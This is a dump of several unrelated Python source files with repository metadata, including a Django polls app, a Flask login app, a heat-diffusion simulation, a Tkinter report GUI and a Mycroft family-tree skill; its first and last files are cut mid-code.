    of the shorter one (or until a stream yields None, its end marker).

    Returns a float in [0.0, 1.0].  When no bits could be compared
    (e.g. both files empty) this returns 0.0 -- previously that case
    raised ZeroDivisionError.
    """
    stream1 = BitStream(file1)
    stream2 = BitStream(file2)
    n_same = 0
    n_different = 0
    for bit1, bit2 in zip(stream1, stream2):
        # A BitStream signals exhaustion by yielding None -- stop there.
        if (bit1 is None or bit2 is None):
            break
        if bit1 == bit2:
            n_same += 1
        else:
            n_different += 1
    total = n_same + n_different
    if total == 0:
        # Nothing to compare: report zero similarity instead of dividing
        # by zero.  (Kept Python 2 compatible -- the CLI below uses the
        # py2 print statement.)
        return 0.0
    return 1.0 * n_same / total
if __name__ == "__main__":
    # CLI entry point: print the bit-similarity of the two files named on
    # the command line.  (Python 2 print statement -- py2-only script.)
    print compare(open(sys.argv[1]), open(sys.argv[2]))
| [
"souvey@ccs.neu.edu"
] | souvey@ccs.neu.edu |
10a74a89df0e005033f9a0040c90b46da278a520 | e71b6d14fbdbc57c7234ca45a47329d7d02fc6f7 | /flask_api/venv/lib/python3.7/site-packages/vsts/member_entitlement_management/v4_1/models/user_entitlement_operation_reference.py | 0e8a8c4903319844a6245687d671b999ccabee76 | [
"MIT"
] | permissive | u-blavins/secret_sasquatch_society | c36993c738ab29a6a4879bfbeb78a5803f4f2a57 | 0214eadcdfa9b40254e331a6617c50b422212f4c | refs/heads/master | 2020-08-14T00:39:52.948272 | 2020-01-22T13:54:58 | 2020-01-22T13:54:58 | 215,058,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .operation_reference import OperationReference
class UserEntitlementOperationReference(OperationReference):
    """UserEntitlementOperationReference.

    :param id: Unique identifier for the operation.
    :type id: str
    :param plugin_id: Unique identifier for the plugin.
    :type plugin_id: str
    :param status: The current status of the operation.
    :type status: object
    :param url: URL to get the full operation object.
    :type url: str
    :param completed: Operation completed with success or failure.
    :type completed: bool
    :param have_results_succeeded: True if all operations were successful.
    :type have_results_succeeded: bool
    :param results: List of results for each operation.
    :type results: list of :class:`UserEntitlementOperationResult <member-entitlement-management.v4_1.models.UserEntitlementOperationResult>`
    """
    # Maps Python attribute names to their wire (JSON) keys and
    # deserialization types for the VSTS client serializer.
    # (This file is auto-generated -- do not hand-edit the mapping.)
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'plugin_id': {'key': 'pluginId', 'type': 'str'},
        'status': {'key': 'status', 'type': 'object'},
        'url': {'key': 'url', 'type': 'str'},
        'completed': {'key': 'completed', 'type': 'bool'},
        'have_results_succeeded': {'key': 'haveResultsSucceeded', 'type': 'bool'},
        'results': {'key': 'results', 'type': '[UserEntitlementOperationResult]'}
    }
    def __init__(self, id=None, plugin_id=None, status=None, url=None, completed=None, have_results_succeeded=None, results=None):
        super(UserEntitlementOperationReference, self).__init__(id=id, plugin_id=plugin_id, status=status, url=url)
        self.completed = completed
        self.have_results_succeeded = have_results_succeeded
        self.results = results
| [
"usama.blavins1@gmail.com"
] | usama.blavins1@gmail.com |
225b6d5941ba617b3affab3562256f853598178b | c15a28ae62eb94dbf3ed13e2065195e572a9988e | /Cook book/src/9/defining_a_decorator_with_user_adjustable_attributes/example2.py | 36d1bb206aabac56e5e7fba7acecdad70229e638 | [] | no_license | xuyuchends1/python | 10798c92840a1a59d50f5dc5738b2881e65f7865 | 545d950a3d2fee799902658e8133e3692939496b | refs/heads/master | 2021-01-25T07:07:04.812140 | 2020-02-28T09:25:15 | 2020-02-28T09:25:15 | 93,647,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,305 | py | # Alternate formulation using function attributes directly
from functools import wraps
import logging
def logged(level, name=None, message=None):
    """
    Decorator factory that logs a message every time the wrapped
    function is called.

    level is the logging level, name the logger name and message the
    log text; name and message fall back to the function's module and
    name respectively.  The level, message and logger are exposed as
    attributes on the wrapper so callers can adjust them after the fact.
    """
    def decorate(func):
        log = logging.getLogger(name or func.__module__)
        default_msg = message or func.__name__

        @wraps(func)
        def wrapper(*args, **kwargs):
            # Read through the wrapper attributes so later adjustments
            # (wrapper.level = ..., wrapper.logmsg = ...) take effect.
            wrapper.log.log(wrapper.level, wrapper.logmsg)
            return func(*args, **kwargs)

        # User-adjustable attributes.
        wrapper.level = level
        wrapper.logmsg = default_msg
        wrapper.log = log
        return wrapper
    return decorate
# Example use
@logged(logging.DEBUG)
def add(x, y):
    """Return x + y (demo target for the @logged decorator)."""
    return x + y
@logged(logging.CRITICAL, 'example')
def spam():
    """Print a message; logs through the 'example' logger at CRITICAL."""
    print('Spam!')
if __name__ == '__main__':
    # Demo: show that the decorator's attributes can be tuned at runtime.
    # (logging is already imported at module scope; this re-import is a
    # harmless no-op kept from the original example.)
    import logging
    logging.basicConfig(level=logging.DEBUG)
    print(add(2, 3))
    # Change the log message
    add.logmsg = 'Add called'
    print(add(2, 3))
    # Change the log level
    add.level = logging.WARNING
    print(add(2, 3))
| [
"xuyuchends@163.com"
] | xuyuchends@163.com |
cdae4d6eaf780f684ddda35f11ba8dc2ccd4d274 | 2173932d81796dc1ebc9c206a663d5d37e0c037b | /lab2/lab2.py | 997fbe4eb6cc49482bfc84d7bc62f9d8476ba25d | [] | no_license | filipprasalek/mops | 8ac4ddcdd27760bdf6dca158fe5045411f4c15bd | 3bf85e6daa2b250fff2c9000f562084ae0d2a7a5 | refs/heads/master | 2020-05-02T01:33:09.485713 | 2019-04-19T21:06:05 | 2019-04-19T21:06:05 | 177,687,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,431 | py | import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import matplotlib.pyplot as plt
from matplotlib import cm
def is_border(i, j, area_size):
    """True when cell (i, j) lies on the outer edge of a square grid
    whose side length is area_size."""
    edge = (0, area_size - 1)
    return i in edge or j in edge
def is_heater(i, j, area_size, heater_size):
    """True when cell (i, j) falls inside the heater square centred in
    a grid of side area_size (half-open bounds, matching range-style
    indexing)."""
    lo = area_size / 2 - heater_size / 2
    hi = area_size / 2 + heater_size / 2
    return lo <= i < hi and lo <= j < hi
def initialize_area(area_size, heater_size, border_temp, heater_temp, interior_temp=20):
    """Build the initial temperature grid for the simulation.

    area_size   -- grid side length in cells
    heater_size -- side length of the centred heater square
    border_temp -- fixed temperature on the outer edge [C]
    heater_temp -- fixed temperature of the heater cells [C]
    interior_temp -- ambient temperature of all other cells [C]
                     (was hard-coded to 20; parameterised with the same
                     default so existing callers are unaffected)

    Returns an (area_size x area_size) numpy array.
    """
    area = np.zeros((area_size, area_size))
    for i in range(area_size):
        for j in range(area_size):
            if is_border(i, j, area_size):
                area[i, j] = border_temp
            elif is_heater(i, j, area_size, heater_size):
                area[i, j] = heater_temp
            else:
                area[i, j] = interior_temp
    return area
def new_x_temp(x, y, previous_area, metal, denominator, dt):
    """Explicit finite-difference heat contribution along the x axis for
    cell (x, y): K * dt * (central second difference) / denominator."""
    laplacian_x = previous_area[x + 1, y] - 2 * previous_area[x, y] + previous_area[x - 1, y]
    return metal["K"] * dt * laplacian_x / denominator
def new_y_temp(x, y, previous_area, metal, denominator, dt):
    """Explicit finite-difference heat contribution along the y axis for
    cell (x, y): K * dt * (central second difference) / denominator."""
    laplacian_y = previous_area[x, y + 1] - 2 * previous_area[x, y] + previous_area[x, y - 1]
    return metal["K"] * dt * laplacian_y / denominator
def draw_3d_plot(area, dx, dy, time, size):
    """Render the temperature grid as a 3-D surface and block on plt.show().

    area -- (size x size) array of temperatures [C]
    dx, dy -- spatial steps [m], used to build the physical axes
    time -- simulated time displayed in the title [s]
    size -- grid side length in cells
    """
    # Convert cell indices to physical coordinates in metres.
    x = np.multiply(np.arange(0, size), dx)
    y = np.multiply(np.arange(0, size), dy)
    xx, yy = np.meshgrid(x, y)
    fig = plt.figure()
    ax = fig.gca(projection='3d')
    ax.set_title("Simulation time: {0}s, spatial step dx = dy = {1}m".format(time, dx, dy))
    surf = ax.plot_surface(xx, yy, area, cmap=cm.coolwarm, linewidth=0, antialiased=True)
    ax.set_xlabel("x [m]")
    ax.set_ylabel("y [m]")
    ax.zaxis.set_major_locator(LinearLocator(10))
    ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
    colorbar = fig.colorbar(surf, shrink=0.5, aspect=5)
    colorbar.set_label("temp [C]")
    plt.show()
def first_boundary_conndition_simulation(steps, initial_area, metal, dx, dy, dt, size, heater_size=None):
    """Run an explicit (FTCS) 2-D heat-diffusion simulation with a
    first-type (Dirichlet) boundary condition and plot the final state.

    steps        -- number of time steps; initial_area[0] is the start state
    initial_area -- list of (size x size) numpy grids, one per step
    metal        -- dict with "cw" (specific heat), "ro" (density),
                    "K" (thermal conductivity)
    dx, dy, dt   -- spatial and temporal step sizes
    size         -- grid side length in cells
    heater_size  -- heater square side; defaults to the module-level
                    h_size (kept for backward compatibility -- the
                    original read the global directly)

    NOTE(review): the grids in initial_area are mutated in place, so
    consecutive calls sharing one list continue from the previous
    result -- confirm that is intended at the call sites.
    """
    if heater_size is None:
        heater_size = h_size  # legacy behaviour: fall back to the module global
    denom_x = metal["cw"] * metal["ro"] * dx ** 2
    denom_y = metal["cw"] * metal["ro"] * dy ** 2
    area_in_step = initial_area
    for i in range(1, steps):
        # Snapshot the previous state.  When the caller builds the list
        # as "[grid] * steps" every entry aliases one buffer, so reading
        # and writing the same array mid-step corrupted the explicit
        # scheme; copying makes the update use a consistent previous state.
        prev_area = area_in_step[i - 1].copy()
        for x in range(1, size - 1):
            for y in range(1, size - 1):
                # Heater cells are held at their fixed temperature.
                if is_heater(x, y, size, heater_size):
                    continue
                x_temp = new_x_temp(x, y, prev_area, metal, denom_x, dt)
                y_temp = new_y_temp(x, y, prev_area, metal, denom_y, dt)
                area_in_step[i][x, y] = prev_area[x, y] + x_temp + y_temp
    draw_3d_plot(area_in_step[steps - 1], dx, dy, dt * steps, size)
# Material properties: ro = density [kg/m^3], cw = specific heat
# [J/(kg*K)], K = thermal conductivity [W/(m*K)].
metal_params = {
    "alumina": {"ro": 2700, "cw": 900, "K": 237},
    "cooper": {"ro": 8920, "cw": 380, "K": 401},
    "steel": {"ro": 7860, "cw": 450, "K": 58}
}
a_size = 6       # grid side length [cells]
h_size = 2       # heater side length [cells]
border_t = 10    # boundary temperature [C]
heater_t = 80    # heater temperature [C]
steps = 100      # number of time steps
dt = 0.01        # time step [s]
dx = dy = 0.01   # spatial step [m]
# Run each material from the same initial condition.  The original code
# had two defects here: "[initialize_area(...)] * steps" repeated ONE
# shared array for every step (so each update overwrote its own input),
# and the single state list was reused across the three materials, so
# each simulation continued from the previous material's result instead
# of starting fresh.
for _metal_name in ("alumina", "cooper", "steel"):
    area_states = [initialize_area(a_size, h_size, border_t, heater_t) for _ in range(steps)]
    first_boundary_conndition_simulation(steps, area_states, metal_params[_metal_name], dx, dy, dt, a_size)
| [
"filip.prasalek@sabre.com"
] | filip.prasalek@sabre.com |
488f782a5d0a2f5fbf2d8e648a04610e918919a7 | 16dcdbb5e2589ce8bd0bfe52b3bd9cdc5c7190b6 | /polls/views.py | 13f02ddf3068d5912d57282934741fa06294be79 | [] | no_license | bstem/EIATool | d2ef68434c2ad0692cfd4ac008fb97031ce6ad95 | be1d7cc455e6088f57c9e7f75badf9e703f07b21 | refs/heads/master | 2021-01-19T12:30:42.082621 | 2017-02-23T22:35:14 | 2017-02-23T22:35:14 | 82,317,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,640 | py | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
from django.views import generic
from .models import Question, Choice
class IndexView(generic.ListView):
    # Landing page: lists the five most recently published questions.
    template_name = 'polls/index.html'
    context_object_name = 'latest_question_list'
    def get_queryset(self):
        """Return the last five published questions, excluding any whose
        pub_date lies in the future."""
        return Question.objects.filter(pub_date__lte=timezone.now()).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
    # Question detail page carrying the voting form.
    model = Question
    template_name = 'polls/detail.html'
    def get_queryset(self):
        """
        Exclude any questions that are not published yet.
        """
        return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
    # Results page showing the vote tallies for one question.
    model = Question
    template_name = 'polls/results.html'
def vote(request, question_id):
    """Record a vote for one choice of the given question.

    On a missing or unknown choice the detail page is re-rendered with
    an error message; on success the vote counter is incremented and the
    user is redirected to the results page.
    """
    question = get_object_or_404(Question, pk=question_id)
    try:
        selected_choice = question.choice_set.get(pk=request.POST['choice'])
    except (KeyError, Choice.DoesNotExist):
        # If error, redisplay the question voting form.
        context = {
            'question': question,
            'error_message': "You didn't select a choice",
        }
        return render(request, 'polls/detail.html', context)
    else:
        # Use an F() expression so the increment happens in the database,
        # avoiding the read-modify-write race when two users vote at the
        # same time (the old "votes += 1; save()" could lose votes).
        from django.db.models import F  # local import keeps this change self-contained
        selected_choice.votes = F('votes') + 1
        selected_choice.save()
        # Always redirect when successfully dealing with POST data --
        # this prevents data from being posted twice if a user hits the
        # Back button.
        return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| [
"CEntzminger@bstem.biz"
] | CEntzminger@bstem.biz |
e1135b626e8b2a874b38079c63bf35c3d5d17c8e | 739e20c1c526c066be0b3248c12bc05c6e57653c | /ibscrubgui.py | df2d12123398599af3dbdbd0f375f9abab94a31f | [] | no_license | betmit324/ib_report | d44eafb8837b2bc07eab4f8805194a3f9cd65c6e | 8de0306f9639e3b231cbf651c230a9091de5a723 | refs/heads/master | 2021-01-11T16:42:55.977376 | 2018-02-27T15:50:00 | 2018-02-27T15:50:00 | 80,143,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,551 | py | import tkinter
from tkinter import ttk
from tkinter.filedialog import askdirectory
import os
import os.path
import time
import ib
import sys
import threading
class StdoutRedirector(object):
    """File-like adapter that appends written text to a Tk text widget.

    Swapped in for sys.stderr so that print/log output shows up inside
    the GUI instead of the console.
    """
    def __init__(self, text_widget):
        # Any object with insert(index, text) and see(index) will do.
        self.text_space = text_widget
    def write(self, string):
        # Append at the end and keep the newest output scrolled into view.
        self.text_space.insert('end', string)
        self.text_space.see('end')
    def flush(self):
        """No-op: nothing is buffered here.

        File-like objects are expected to provide flush(); without it any
        code that calls sys.stderr.flush() (e.g. logging handlers or
        traceback printing) raised AttributeError.
        """
        pass
class IbScrubGui(tkinter.Tk):
    """Main window of the IB scrub report tool.

    The user picks a working directory, then the report is generated by
    ib.IbDetails on a background thread so the Tk event loop stays
    responsive; sys.stderr is redirected into the window's text box so
    progress output is visible in the GUI.
    """
    def __init__(self, parent):
        tkinter.Tk.__init__(self, parent)
        self.parent = parent
        # Options for the directory-chooser dialog (dir_opt and options
        # alias the same dict).
        self.dir_opt = options = {}
        self.directory = ''
        options['initialdir'] = os.path.join(os.path.expanduser('~'), "Documents")
        options['mustexist'] = True
        options['parent'] = parent
        options['title'] = 'This is a title'
        self.working_dir_var = tkinter.StringVar()
        self.working_dir_label_var = tkinter.StringVar()
        self.select_button = ttk.Button(self, text="Choose Source Directory",
                                        command=self.on_select_button_click)
        self.select_button.grid(column=0, row=0, sticky='NW', padx=10, pady=10)
        self.generate_button = ttk.Button(self, text="Generate IB Scrub Report",
                                          command=self.on_generate_button_click)
        self.generate_button.grid(column=1, row=0, sticky='NE', padx=10, pady=10)
        self.text_box = tkinter.Text(self.parent, wrap='word', height=28, width=50)
        self.text_box.grid(column=0, row=2, columnspan=2, sticky='NSWE', padx=5, pady=5)
        # Route stderr into the GUI text box.
        sys.stderr = StdoutRedirector(self.text_box)
        # Worker thread handle; checked before starting another run.
        self.active_thread = None
        # self.include_flash = tkinter.IntVar()
        # self.new_asups = tkinter.IntVar()
        self.initialize()
    def initialize(self):
        """Lay out the widgets and fix the initial window geometry."""
        self.grid()
        self.working_dir_var.set("Select working directory")
        # label = tkinter.Label(self, textvariable=self.working_dir_label_var, anchor="w", fg="white", bg="blue")
        style = ttk.Style()
        style.configure("BW.TLabel", anchor="w", foreground="white", background="blue")
        label = ttk.Label(style="BW.TLabel", textvariable=self.working_dir_label_var)
        label.grid(column=0, row=1, columnspan=2, sticky='EW', padx=10, pady=10)
        self.working_dir_label_var.set("Please select working directory with IB Details, Service Contracts Expiring, score.xlsx, etc")
        # ttk.Checkbutton(self, text="Include Flash Tab", variable=self.include_fl).grid(row=3, sticky='W')
        # ttk.Checkbutton(self, text="Get New Asups", variable=self.new_asups).grid(row=4, sticky='W')
        # Generating is disabled until a directory has been chosen.
        self.generate_button['state'] = 'disabled'
        self.grid_columnconfigure(0, weight=1)
        self.resizable(True, False)
        self.minsize(width=1000, height=600)
        self.update()
        self.geometry(self.geometry())
    def on_select_button_click(self):
        """Prompt for the working directory; ignored while a report run
        is in progress."""
        if not self.active_thread or not self.active_thread.is_alive():
            self.directory = askdirectory()
            if self.directory:
                # NOTE(review): chdir affects the whole process; the
                # worker thread relies on it to find its input files.
                os.chdir(self.directory)
                self.working_dir_label_var.set(self.directory)
                # with open("thisisatest.txt", 'w') as f:
                #     print(self.directory, file=f)
                # print("You clicked the select button")
                self.generate_button['state'] = 'normal'
    def on_generate_button_click(self):
        """Start ib.IbDetails on a worker thread; no-op while one is
        already running."""
        if not self.active_thread or not self.active_thread.is_alive():
            # self.generate_button['state'] = 'disabled'
            # self.select_button['state'] = 'disabled'
            # ib_report = ib.IbDetails()
            print("Starting...", file=sys.stderr)
            # if self.include_flash.get():
            #     include_flash = True
            # else:
            #     include_flash = False
            # if self.new_asups.get():
            #     new_asups = True
            # else:
            #     new_asups = False
            self.active_thread = threading.Thread(target=ib.IbDetails)
            self.active_thread.start()
            # time.sleep(1)
            # os.system("start " + os.path.join(self.directory, "thisisatest.txt"))
            # os.system("start " + os.path.join(self.directory, ib_report.get_ib_report_name()))
            # print("You clicked the generate button")
            # self.generate_button['state'] = 'normal'
            # self.select_button['state'] = 'normal'
if __name__ == "__main__":
    # Build the window and enter the Tk event loop.
    app = IbScrubGui(None)
    app.title('IB Team Installed Base Scrub v1.8')
    app.mainloop()
| [
"betmit324@gmail.com"
] | betmit324@gmail.com |
49a988bfd6d2afbbbf60fd6596b72b40d5ceae43 | d27f38f666942e07446c0a2dba546652c16b80e3 | /app/routes.py | 341ef2a0327266dd8d8e3320174299a88b60ccc5 | [] | no_license | johnieje/switcha | 4da3238bb3af43670f09bbc563f821e5a4044302 | 6a46f7e7fa832af6c492d3dff0ce10b592e1e8f0 | refs/heads/master | 2022-04-19T07:32:56.209503 | 2020-04-18T12:16:26 | 2020-04-18T12:16:26 | 256,761,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,237 | py | from flask import render_template, flash, redirect, url_for, request
from app import app, db
from app.switches import Switch
from app.forms import LoginForm, RegistrationForm
from flask_login import current_user, login_user, logout_user, login_required
from app.models import User
from werkzeug.urls import url_parse
@app.route('/')
@app.route('/index')
@login_required
def index():
    """Render the home page with the device list.

    NOTE(review): the device inventory is hard-coded; presumably it will
    be loaded from the database or by probing switches later.  The old
    probing snippet was dead code (a bare triple-quoted string literal
    that only looked like a comment) and has been removed.
    """
    var = {'app_name': 'Switcha Network Management Solution'}
    devices = [
        {
            'id': 1,
            'name': 'Statistics House',
            'ip': '41.222.1.105'
        },
    ]
    return render_template('index.html', title="Home", devices=devices, var=var)
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Log a user in.

    GET renders the login form; POST validates credentials and, on
    success, redirects to the originally requested page (the `next`
    query parameter) or to the index.
    """
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = LoginForm()
    if form.validate_on_submit():
        user = User.query.filter_by(username=form.username.data).first()
        if user is None or not user.check_password(form.password.data):
            flash('Invalid Username or Password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        next_page = request.args.get('next')
        # Only honour same-site redirect targets: a `next` value with a
        # netloc would be an open redirect to another host.
        if not next_page or url_parse(next_page).netloc != '':
            next_page = url_for('index')
        return redirect(next_page)
    return render_template('login.html', title='Sign In', form=form)
@app.route('/logout')
def logout():
    """Log the current user out and return to the index page."""
    logout_user()
    return redirect(url_for('index'))
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Create a new user account.

    Authenticated users are sent back to the index; on a valid POST the
    new user is stored with a hashed password and the visitor is
    redirected to the login page.
    """
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = RegistrationForm()
    if form.validate_on_submit():
        user = User(username=form.username.data, email=form.email.data)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('Congratulations, you are now a registered user!')
        return redirect(url_for('login'))
    return render_template('register.html', title='Register', form=form)
| [
"johnieje@yahoo.com"
] | johnieje@yahoo.com |
a2635ca00b66a4ad203a975c8ff1cd9f28207c6b | 6c26d154b4a216c2f3a84891383a8d18299c527f | /NXHello/NXWebserver/NXWebserver.py | ef68321d09381ae215793c6c7e53dd281655bd4d | [] | no_license | htonal/NXHello | 6b03df95737bc55af526ed3f47cd0b12b11b0b31 | 7b4545e4f811136abd1e0efc29d17c0567de2ccb | refs/heads/master | 2020-05-24T16:37:35.921873 | 2019-05-18T13:49:42 | 2019-05-18T13:49:42 | 183,691,739 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,312 | py | # -*- coding: utf-8 -*-
# Copyright 2019 TONAL SYSTEM
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
from pathlib import Path
import logging
import NXSettingsConfig
from flask import Flask, Blueprint
from flask import redirect, url_for
# from flask_appbuilder import AppBuilder, SQLA
from NXTest.NXTest import NXTest
# Blueprint registered on the Flask app by NXWebserver below.
routes = Blueprint('routes', __name__)
@routes.route('/')
def index():
    # return redirect(url_for('Airflow.index'))
    # Placeholder landing page; the redirect above is kept disabled for
    # reference until the real index view exists.
    return 'Hello, World!'
class NXWebserver:
    """Thin wrapper around a Flask application exposing the module's
    `routes` blueprint."""
    def __init__(self):
        self.app = Flask(__name__)
        self.app.register_blueprint(routes)
    def run(self):
        """Start the Flask development server.

        Any startup failure is logged as critical and swallowed -- this
        is the process's top-level boundary.
        """
        try:
            logging.info('webserver starting')
            self.app.run()
        except Exception as e:
            logging.critical(e)
| [
"info@tonal.fr"
] | info@tonal.fr |
04615ee4d3c0ae9fc7d72354e454938c68ec91bb | 7a7e560d4aecf4fd57bdcd8648d0ed9e1077c640 | /test03/test04.py | a7e1a7725e600a296c618d66b33cea7a98357e22 | [] | no_license | programmingkids/python-test-level2 | 8b8168306b27b9659d8991086d1e62a545917c3d | 1a4b983a1f615275ab3dd2e89d42b0916cf7c848 | refs/heads/master | 2022-11-21T15:35:15.883339 | 2020-07-20T09:54:01 | 2020-07-20T09:54:01 | 281,015,098 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53 | py | # 実行結果
# 66
# Exercise stub: the expected output above (66) is presumably the sum of
# the even values in `data` (12 + 14 + 18 + 22) -- the computation is
# intentionally left for the student to write.
data = [12,15,25,11,14,18,22]
| [
"ec2-user@ip-172-31-11-152.ap-northeast-1.compute.internal"
] | ec2-user@ip-172-31-11-152.ap-northeast-1.compute.internal |
77c26d3223480b1ecc5baddd9d23d61fb4fd4509 | 0c176cbc9e0965f89e60b410c8413519d291f51d | /__init__.py | cc0674ca22643c6b993a0879c528718dd15f286c | [] | no_license | henridbr/henridbr-my_family_tree | 353b01af5d3152c1778775b4c262d3c17c6347bf | 727339dc710be79deaab56f5f8eb8c52d8fb4522 | refs/heads/master | 2022-08-01T10:22:52.663316 | 2020-05-25T19:17:56 | 2020-05-25T19:17:56 | 152,764,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,586 | py | # Copyright 2016 Mycroft AI, Inc.
#
# This file is part of Mycroft Core.
#
# Mycroft Core is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mycroft Core is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mycroft Core. If not, see <http://www.gnu.org/licenses/>.
# Mycroft_my_family_tree
# Mycroft libraries
from adapt.intent import IntentBuilder
from mycroft.skills.core import MycroftSkill
from mycroft.util.log import getLogger
from mycroft import intent_handler
from os.path import dirname, exists, join
import requests
import os
import json
__author__ = 'henridbr' # hd@uip
LOGGER = getLogger(__name__)
class MyFamilyTreeSkill(MycroftSkill):
    """Mycroft skill that answers questions about family members.

    All handlers read `familybook.json` (stored next to this file) and
    look up members by rank, name, location, age or feature.

    NOTE(review): the handlers pass fully formatted sentences to
    self.speak_dialog(); speak_dialog normally takes a dialog *file*
    name, so confirm these resolve as intended (self.speak may be what
    was meant, as the later handlers use).
    """
    def __init__(self):
        super(MyFamilyTreeSkill, self).__init__(name="MyFamilyTreeSkill")
    @intent_handler(IntentBuilder("MyFamilyTreeIntent").require("MyFamilyTreeKeyword"))
    def handle_family_learning_intent(self, message):
        """Acknowledge a general family-tree utterance."""
        self.speak_dialog("got.it.memory")
    ### Find who is my <relation> (e.g. "who is my sister?")
    @intent_handler(IntentBuilder("FamilyMemberIntent").require("FamilyMemberKeyword"))
    def handle_family_member_intent(self, message):
        """Speak the name(s) of every member whose rank matches the
        requested relation."""
        family_rank = message.data.get("FamilyMemberKeyword")
        # print(family_rank)
        with open(join(os.path.dirname(__file__), 'familybook.json'), "r") as read_file:
            family = json.load(read_file)
        membersname = family['family_dictionary']['members']
        namelist = []
        namegroup = ""
        i=0
        # Collect the first names of everyone holding the requested rank.
        while i< len(membersname):
            if (membersname[i]['rank'] == family_rank):
                namelist.append(membersname[i]['first_name'])
            i = i+1
        # i starts at 1 below because namelist[0] seeds the joined string.
        i=1
        if len(namelist) ==0 :
            self.speak_dialog('you have no {}'.format(family_rank))
        elif len(namelist) ==1 :
            self.speak_dialog('{} is your {}'.format(namelist[0],family_rank))
        else:
            namegroup = namelist[0]
            while i< len(namelist):
                namegroup = namegroup +" and " + namelist[i]
                i = i+1
            self.speak_dialog('{} are your {}'.format(namegroup,family_rank))
    #### Find the living place of someone
    @intent_handler(IntentBuilder("LivingPlaceIntent").require("LivingPlaceKeyword").require("FamilyFirstName"))
    def handle_living_place(self, message):
        """Speak where the named family member lives."""
        member = message.data.get('FamilyFirstName')
        with open(join(os.path.dirname(__file__), 'familybook.json'), "r") as read_file:
            family = json.load(read_file)
        membersname = family['family_dictionary']['members']
        memberslivingplace ={}
        i=0
        foundit = ""
        # Match the (lower-cased) spoken name against the book; on a hit,
        # normalise `member` to the canonical first name.
        while i< len(membersname):
            if (member.find(membersname[i]['first_name'].lower())>=0):
                member = membersname[i]['first_name']
                foundit = "found"
            i=i+1
        if (foundit==""):
            self.speak('Sorry, I missed something')
        else:
            print(member)
            i=0
            # Build a name -> location map, then answer from it.
            while i< len(membersname):
                who = membersname[i]['first_name']
                where = membersname[i]['location']
                memberslivingplace[who] = where
                i=i+1
            livingplace = memberslivingplace[member]
            self.speak('{} is from {}'.format(member, livingplace))
    #### Find the age of someone
    @intent_handler(IntentBuilder("SomeOneAgeIntent").require("SomeOneAgeKeyword").require("FamilyFirstName"))
    def handle_someone_age(self, message):
        """Speak the age of the named family member ("dead" is a special
        value in the family book)."""
        member = message.data.get('FamilyFirstName')
        with open(join(os.path.dirname(__file__), 'familybook.json'), "r") as read_file:
            family = json.load(read_file)
        membersname = family['family_dictionary']['members']
        membersage ={}
        foundit = ""
        i=0
        while i< len(membersname):
            if (member.find(membersname[i]['first_name'].lower())>=0):
                member = membersname[i]['first_name']
                foundit = "found"
            i=i+1
        if (foundit==""):
            self.speak('Sorry, I missed something')
        else:
            print(member)
            i=0
            while i< len(membersname):
                who = membersname[i]['first_name']
                so_age = membersname[i]['age']
                membersage[who] = so_age
                i=i+1
            member_age = membersage[member]
            if (member_age == "dead"):
                self.speak('{} is {}'.format(member, member_age))
            else:
                self.speak('{} is {} old'.format(member, member_age))
    #### Find a distinguishing feature of someone
    @intent_handler(IntentBuilder("SomeOneFeatureIntent").require("SomeOneFeatureKeyword").require("FamilyFirstName"))
    def handle_someone_feature(self, message):
        """Speak the recorded feature of the named family member, or an
        apology when none is recorded."""
        member = message.data.get('FamilyFirstName')
        with open(join(os.path.dirname(__file__), 'familybook.json'), "r") as read_file:
            family = json.load(read_file)
        membersname = family['family_dictionary']['members']
        membersfeature ={}
        foundit = ""
        i=0
        while i< len(membersname):
            if (member.find(membersname[i]['first_name'].lower())>=0):
                member = membersname[i]['first_name']
                foundit = "found"
            i=i+1
        if (foundit==""):
            self.speak('Sorry, I missed something')
        else:
            print(member)
            i=0
            while i< len(membersname):
                who = membersname[i]['first_name']
                so_feature = membersname[i]['feature']
                membersfeature[who] = so_feature
                i=i+1
            member_feature = membersfeature[member]
            if (member_feature == ""):
                self.speak('Sorry, I don\'t know more on {}'.format(member))
            else:
                self.speak('{} is really {}'.format(member, member_feature))
    def stop(self):
